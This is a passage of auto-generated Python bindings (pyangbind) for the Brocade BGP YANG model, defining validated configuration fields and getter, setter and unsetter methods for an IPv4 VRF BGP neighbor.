self.__associate_peer_group = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9\\\\\\\\@#\\+\\*\\(\\)=\\{~\\}%<>=$_\\[\\]\\|]{0,62})'}), is_leaf=True, yang_name="associate-peer-group", rest_name="peer-group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Assign peer-group to neighbor', u'alt-name': u'peer-group'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-peergroup', is_config=True)
self.__soft_reconfiguration = YANGDynClass(base=soft_reconfiguration.soft_reconfiguration, is_container='container', presence=False, yang_name="soft-reconfiguration", rest_name="soft-reconfiguration", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Per neighbor soft reconfiguration', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__remote_as = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5]))\\.(([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5])))|([1-9][0-9]{0,8})|([1-3][0-9]{9})|(4[0-1][0-9]{8})|(42[0-8][0-9]{7})|(429[0-3][0-9]{6})|(4294[0-8][0-9]{5})|(42949[0-5][0-9]{4})|(429496[0-6][0-9]{3})|(4294967[0-1][0-9]{2})|(42949672[0-8][0-9])|(429496729[0-5])'}), is_leaf=True, yang_name="remote-as", rest_name="remote-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify a BGP neighbor'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-remote-as', is_config=True)
self.__maxas_limit = YANGDynClass(base=maxas_limit.maxas_limit, is_container='container', presence=False, yang_name="maxas-limit", rest_name="maxas-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Impose limit on number of ASes in AS-PATH attribute', u'cli-compact-syntax': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__ebgp_multihop = YANGDynClass(base=ebgp_multihop.ebgp_multihop, is_container='container', presence=False, yang_name="ebgp-multihop", rest_name="ebgp-multihop", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow EBGP neighbors not on directly connected networks'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__bfd = YANGDynClass(base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable BFD session for the neighbor', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__allowas_in = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..10']}), is_leaf=True, yang_name="allowas-in", rest_name="allowas-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disables the AS_PATH check of the routes learned from the AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='uint32', is_config=True)
self.__additional_paths = YANGDynClass(base=additional_paths.additional_paths, is_container='container', presence=False, yang_name="additional-paths", rest_name="additional-paths", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Specify bgp additional paths', u'hidden': u'full', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__maximum_prefix = YANGDynClass(base=maximum_prefix.maximum_prefix, is_container='container', presence=False, yang_name="maximum-prefix", rest_name="maximum-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Maximum number of prefix accept from this peer', u'cli-incomplete-no': None, u'cli-break-sequence-commands': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__update_source = YANGDynClass(base=update_source.update_source, is_container='container', presence=False, yang_name="update-source", rest_name="update-source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Source of routing updates', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__prefix_list = YANGDynClass(base=prefix_list.prefix_list, is_container='container', presence=False, yang_name="prefix-list", rest_name="prefix-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Prefix List for filtering routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__neighbor_route_map = YANGDynClass(base=neighbor_route_map.neighbor_route_map, is_container='container', presence=False, yang_name="neighbor-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply route map to neighbor', u'alt-name': u'route-map', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__static_network_edge = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="static-network-edge", rest_name="static-network-edge", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor as special service edge, static-network\nshall not be advertised if installed as DROP', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
self.__description = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..220']}), is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor by description', u'cli-multi-value': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='neighbor-description', is_config=True)
self.__local_as = YANGDynClass(base=local_as.local_as, is_container='container', presence=False, yang_name="local-as", rest_name="local-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Assign local-as number to neighbor', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-break-sequence-commands': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__advertisement_interval = YANGDynClass(base=advertisement_interval.advertisement_interval, is_container='container', presence=False, yang_name="advertisement-interval", rest_name="advertisement-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Minimum interval between sending BGP routing updates', u'cli-compact-syntax': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__af_nei_weight = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..65535']}), is_leaf=True, yang_name="af-nei-weight", rest_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set default weight for routes from this neighbor', u'cli-full-command': None, u'alt-name': u'weight'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='nei-weight', is_config=True)
self.__next_hop_self = YANGDynClass(base=next_hop_self.next_hop_self, is_container='container', presence=False, yang_name="next-hop-self", rest_name="next-hop-self", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable the next hop calculation for this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__password = YANGDynClass(base=unicode, is_leaf=True, yang_name="password", rest_name="password", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable TCP-MD5 password protection', u'cli-multi-value': None, u'suppress-echo': u'true'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-password', is_config=True)
self.__enforce_first_as = YANGDynClass(base=enforce_first_as.enforce_first_as, is_container='container', presence=False, yang_name="enforce-first-as", rest_name="enforce-first-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enforce the first AS for EBGP routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__filter_list = YANGDynClass(base=filter_list.filter_list, is_container='container', presence=False, yang_name="filter-list", rest_name="filter-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Establish BGP filters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__send_community = YANGDynClass(base=send_community.send_community, is_container='container', presence=False, yang_name="send-community", rest_name="send-community", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Send community attribute to this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__timers = YANGDynClass(base=timers.timers, is_container='container', presence=False, yang_name="timers", rest_name="timers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'BGP per neighbor timers', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__af_vrf_neighbor_capability = YANGDynClass(base=af_vrf_neighbor_capability.af_vrf_neighbor_capability, is_container='container', presence=False, yang_name="af-vrf-neighbor-capability", rest_name="capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Advertise capability to the peer', u'alt-name': u'capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'routing-system', u'router', u'router-bgp', u'address-family', u'ipv4', u'ipv4-unicast', u'af-vrf', u'neighbor', u'af-ipv4-vrf-neighbor-address-holder', u'af-ipv4-neighbor-addr']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'router', u'bgp', u'address-family', u'ipv4', u'unicast', u'vrf', u'neighbor', u'af-ipv4-neighbor-addr']
def _get_af_ipv4_neighbor_address(self):
"""
Getter method for af_ipv4_neighbor_address, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/af_ipv4_neighbor_address (inet:ipv4-address)
"""
return self.__af_ipv4_neighbor_address
def _set_af_ipv4_neighbor_address(self, v, load=False):
"""
Setter method for af_ipv4_neighbor_address, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/af_ipv4_neighbor_address (inet:ipv4-address)
If this variable is read-only (config: false) in the
source YANG file, then _set_af_ipv4_neighbor_address is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_af_ipv4_neighbor_address() directly.
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="af-ipv4-neighbor-address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A.B.C.D;;Neighbor Address', u'alt-name': u'address'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='inet:ipv4-address', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """af_ipv4_neighbor_address must be of a type compatible with inet:ipv4-address""",
'defined-type': "inet:ipv4-address",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="af-ipv4-neighbor-address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A.B.C.D;;Neighbor Address', u'alt-name': u'address'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='inet:ipv4-address', is_config=True)""",
})
self.__af_ipv4_neighbor_address = t
if hasattr(self, '_set'):
self._set()
def _unset_af_ipv4_neighbor_address(self):
self.__af_ipv4_neighbor_address = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="af-ipv4-neighbor-address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A.B.C.D;;Neighbor Address', u'alt-name': u'address'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='inet:ipv4-address', is_config=True)
def _get_remote_as(self):
"""
Getter method for remote_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/remote_as (bgp-remote-as)
"""
return self.__remote_as
def _set_remote_as(self, v, load=False):
"""
Setter method for remote_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/remote_as (bgp-remote-as)
If this variable is read-only (config: false) in the
source YANG file, then _set_remote_as is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_remote_as() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5]))\\.(([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5])))|([1-9][0-9]{0,8})|([1-3][0-9]{9})|(4[0-1][0-9]{8})|(42[0-8][0-9]{7})|(429[0-3][0-9]{6})|(4294[0-8][0-9]{5})|(42949[0-5][0-9]{4})|(429496[0-6][0-9]{3})|(4294967[0-1][0-9]{2})|(42949672[0-8][0-9])|(429496729[0-5])'}), is_leaf=True, yang_name="remote-as", rest_name="remote-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify a BGP neighbor'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-remote-as', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """remote_as must be of a type compatible with bgp-remote-as""",
'defined-type': "brocade-bgp:bgp-remote-as",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5]))\\.(([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5])))|([1-9][0-9]{0,8})|([1-3][0-9]{9})|(4[0-1][0-9]{8})|(42[0-8][0-9]{7})|(429[0-3][0-9]{6})|(4294[0-8][0-9]{5})|(42949[0-5][0-9]{4})|(429496[0-6][0-9]{3})|(4294967[0-1][0-9]{2})|(42949672[0-8][0-9])|(429496729[0-5])'}), is_leaf=True, yang_name="remote-as", rest_name="remote-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify a BGP neighbor'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-remote-as', is_config=True)""",
})
self.__remote_as = t
if hasattr(self, '_set'):
self._set()
def _unset_remote_as(self):
self.__remote_as = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5]))\\.(([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5])))|([1-9][0-9]{0,8})|([1-3][0-9]{9})|(4[0-1][0-9]{8})|(42[0-8][0-9]{7})|(429[0-3][0-9]{6})|(4294[0-8][0-9]{5})|(42949[0-5][0-9]{4})|(429496[0-6][0-9]{3})|(4294967[0-1][0-9]{2})|(42949672[0-8][0-9])|(429496729[0-5])'}), is_leaf=True, yang_name="remote-as", rest_name="remote-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify a BGP neighbor'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-remote-as', is_config=True)
def _get_shutdown(self):
"""
Getter method for shutdown, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/shutdown (container)
"""
return self.__shutdown
def _set_shutdown(self, v, load=False):
"""
Setter method for shutdown, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/shutdown (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_shutdown is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_shutdown() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=shutdown.shutdown, is_container='container', presence=False, yang_name="shutdown", rest_name="shutdown", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Administratively shut down this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """shutdown must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=shutdown.shutdown, is_container='container', presence=False, yang_name="shutdown", rest_name="shutdown", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Administratively shut down this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__shutdown = t
if hasattr(self, '_set'):
self._set()
def _unset_shutdown(self):
self.__shutdown = YANGDynClass(base=shutdown.shutdown, is_container='container', presence=False, yang_name="shutdown", rest_name="shutdown", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Administratively shut down this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_af_vrf_neighbor_capability(self):
"""
Getter method for af_vrf_neighbor_capability, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/af_vrf_neighbor_capability (container)
"""
return self.__af_vrf_neighbor_capability
def _set_af_vrf_neighbor_capability(self, v, load=False):
"""
Setter method for af_vrf_neighbor_capability, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/af_vrf_neighbor_capability (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_af_vrf_neighbor_capability is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_af_vrf_neighbor_capability() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=af_vrf_neighbor_capability.af_vrf_neighbor_capability, is_container='container', presence=False, yang_name="af-vrf-neighbor-capability", rest_name="capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Advertise capability to the peer', u'alt-name': u'capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """af_vrf_neighbor_capability must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=af_vrf_neighbor_capability.af_vrf_neighbor_capability, is_container='container', presence=False, yang_name="af-vrf-neighbor-capability", rest_name="capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Advertise capability to the peer', u'alt-name': u'capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__af_vrf_neighbor_capability = t
if hasattr(self, '_set'):
self._set()
def _unset_af_vrf_neighbor_capability(self):
self.__af_vrf_neighbor_capability = YANGDynClass(base=af_vrf_neighbor_capability.af_vrf_neighbor_capability, is_container='container', presence=False, yang_name="af-vrf-neighbor-capability", rest_name="capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Advertise capability to the peer', u'alt-name': u'capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_allowas_in(self):
"""
Getter method for allowas_in, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/allowas_in (uint32)
"""
return self.__allowas_in
def _set_allowas_in(self, v, load=False):
"""
Setter method for allowas_in, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/allowas_in (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_allowas_in is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_allowas_in() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..10']}), is_leaf=True, yang_name="allowas-in", rest_name="allowas-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disables the AS_PATH check of the routes learned from the AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """allowas_in must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..10']}), is_leaf=True, yang_name="allowas-in", rest_name="allowas-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disables the AS_PATH check of the routes learned from the AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='uint32', is_config=True)""",
})
self.__allowas_in = t
if hasattr(self, '_set'):
self._set()
def _unset_allowas_in(self):
self.__allowas_in = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..10']}), is_leaf=True, yang_name="allowas-in", rest_name="allowas-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disables the AS_PATH check of the routes learned from the AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='uint32', is_config=True)
def _get_filter_list(self):
"""
Getter method for filter_list, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/filter_list (container)
"""
return self.__filter_list
def _set_filter_list(self, v, load=False):
"""
Setter method for filter_list, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/filter_list (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_filter_list is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_filter_list() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=filter_list.filter_list, is_container='container', presence=False, yang_name="filter-list", rest_name="filter-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Establish BGP filters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """filter_list must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=filter_list.filter_list, is_container='container', presence=False, yang_name="filter-list", rest_name="filter-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Establish BGP filters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__filter_list = t
if hasattr(self, '_set'):
self._set()
def _unset_filter_list(self):
